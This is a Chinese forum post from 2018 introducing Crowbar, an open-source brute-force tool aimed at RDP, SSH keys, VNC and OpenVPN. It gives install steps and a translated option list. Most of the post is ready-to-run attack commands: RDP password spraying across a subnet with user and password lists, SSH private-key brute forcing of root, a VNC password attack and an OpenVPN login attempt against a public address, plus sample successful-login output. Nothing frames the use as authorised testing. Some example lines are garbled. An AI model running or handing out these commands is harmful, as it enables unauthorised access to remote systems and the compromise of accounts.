搜索
查看: 472|回复: 0

Crowbar:开源暴破工具,支持openvpn,rdp,ssh,vnc

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2018-8-9 22:22:07 | 显示全部楼层 |阅读模式

安装

安装所有依赖

从github上得到最新版本

# git clone [url=http://github.com/galkan/crowbar]http://github.com/galkan/crowbar

注:RDP客户端包的选择取决于你的操作系统:

·Debian      7/8 或者 Kali 1/2 使用 freerdp-x11 包;
·其他系统可以试试xfreerdp.
·不行的话你可能还需要编译并调试freerdp,请参考 :opentechnotes.blogspot.co.uk/2015/02/compile-headless-freerdp-credential-checking.html

别忘了编辑一个脚本指向它。

使用方法

-b:锁定服务 。Crowbar 支持的有: openvpn, rdp, sshkey, vnckey。

-c: 使用静态密码登录。Static password to login with

-C: </path/to/file>来获取密码列表。

-d: 在暴力破解之前,运行一个tcp端口在一定范围IP内range (-s/-S)扫描(nmap)。这会检测出目标端口是否开启。

-D: 切换成debug模式。

-h: 显示帮助菜单。

-k: </path/to/file-or-folder>获取key秘钥文件(SSH 或者VNC的)。

-l: 使用</path/to/file>来存储日志文件log file(默认是./crowbar.log)。

-m: </path/to/file>来获取一个OpenVPN 配置文件。

-n: 获取线程数。

-o: </path/to/file>来存储成功的尝试(默认是is ./crowbar.out)。

-p: 端口号(如果目标服务器不是在默认端口上)。

-q: 切换成安静模式quiet mode (只显示成功登录)。

-s: 获取IP地址/范围(加CIDR 标记)。

-S: </path/to/file>存储目标IP地址。

-t: 获取Timeout 值。

-u: 获取单一用户名。

-U: </path/to/file>存储用户名列表。

-v: 切换成完全模式verbose mode (显示所有记录)。

如果你需要查看所有使用选项,请使用./crowbar.py --help查看。
注意:如果你想要使用包含了DOMAIN的用户名,请将用户名具体化如下所示, Backslash () 是Python的转移字符。所以你不得不使用下面两种格式的其中之一。
# ./crowbar.py -b rdp -u DOMAIN\gokhan alkan -c Aa123456 -s 10.68.35.150/322015-03-28 11:03:39 RDP-SUCCESS : 10.68.35.150:3389 - "DOMAINgokhan alkan":Aa123456, # ./crowbar.py -b rdp -u gokhan alkan@ornek -c Aa123456 -s 10.68.35.150/322015-03-28 11:04:00 RDP-SUCCESS : 10.68.35.150:3389 - "gokhan alkan@DOMAIN":Aa123456,
暴力破解远程桌面协议(RDP)
下面是使用Crowbar暴破RDP的几个例子。
使用单一用户名和单一的密码RDP暴破一个单一的IP地址:
# ./crowbar.py -b rdp -s 192.168.2.182/32 -u admin -c Aa123456
# ./crowbar.py -b rdp -s 192.168.2.211/32 -U /root/Desktop/userlist -c passw0rd

使用一个用户名列表文件和密码列表RDP暴破单一的IP地址:

# ./crowbar.py -b rdp -s 192.168.2.250/32 -u localuser -C /root/Desktop/passlist

使用一个用户名列表文件和密码列表在discovery模式下RDP暴破一个子网:

# ./crowbar.py -b rdp -s 192.168.2.0/24 -U /root/Desktop/userlist -C /root/Desktop/passlist -d

暴破SSH私钥

以下是使用Crowbar实现暴破SSH私钥的一些例子:

使用单一用户名和单一SSH私钥进行SSH私钥暴破单一IP地址:

# ./crowbar.py -b sshkey -s 192.168.2.105/32 -u root -k /root/.ssh/id_rsa

使用单一用户名和SSH私钥文件进行SSH私钥暴破单一IP地址:

# ./crowbar.py -b sshkey -s 192.168.2.105/32 -u root -k /root/.ssh/

在discovery模式下使用单一用户名和SSH私钥文件进行SSH私钥暴破单一子网:

# ./crowbar.py -b sshkey -s 192.168.2.0/24 -u root -k /root/.ssh/ -d

暴破VNC

以下是使用Crowbar实现暴破一个VNC服务的一个例子:

使用密码文件和特定端口号VNC暴破单一IP地址:

# ./crowbar.py -b vnckey -s 192.168.2.105/32 -p 5902 -k /root/.vnc/passwd

暴破OpenVPN

以下是使用Crowbar实现暴破OpenVPN的一个例子:

通过特定端口号OpenVPN暴破获取一个IP地址,使用了一个配置文件,一个认证文件,一个用户名和一个密码:

# ./crowbar.py -b openvpn -s 198.7.62.204/32 -p 443 -m /root/Desktop/vpnbook.ovpn -k /root/Desktop/vpnbook_ca.crt -u vpnbook -c cr2hudaF

日志和输出文件






本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表